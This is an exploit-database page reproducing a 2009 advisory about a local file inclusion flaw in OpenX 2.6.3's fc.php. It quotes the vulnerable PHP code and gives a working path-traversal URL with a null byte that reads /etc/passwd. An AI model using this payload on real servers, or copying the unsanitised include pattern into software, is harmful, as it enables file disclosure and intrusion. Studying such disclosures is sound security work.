Lucene search
K

OpenX 2.6.3 Local File Inclusion

🗓️ 27 Jan 2009 00:00:00Reported by system_meltdownType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 17 Views

OpenX 2.6.3 Local File Inclusion in fc.php scrip

Code
`I have found a local file inclusion exploit in OpenX 2.6.3, this is in the script "fc.php", located in /www/delivery/  
  
Here is a snip of the code:  
[snip]  
include_once '../../init-delivery.php';  
$MAX_PLUGINS_AD_PLUGIN_NAME = 'MAX_type';  
if(!isset($_GET[$MAX_PLUGINS_AD_PLUGIN_NAME])) {  
echo $MAX_PLUGINS_AD_PLUGIN_NAME . ' is not specified';  
exit(1);  
}  
$tagName = $_GET[$MAX_PLUGINS_AD_PLUGIN_NAME];  
$tagFileName = MAX_PATH . '/plugins/invocationTags/'.$tagName.'/'.$tagName.'.delivery.php';  
if(!file_exists($tagFileName)) {  
echo 'Invocation plugin delivery file "' . $tagFileName . '" doesn\'t exists';  
exit(1);  
}  
include $tagFileName;  
[/snip]  
  
As you can see, it is checking whether the file you have inputted exists. This can be exploited like so:  
  
http://host/path/to/openx/www/delivery/fc.php??MAX_type=../../../../../../../../../../../../../../etc/passwd%00  
  
Enjoy.  
  
-Charlie  
[Elites0ft.com]  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation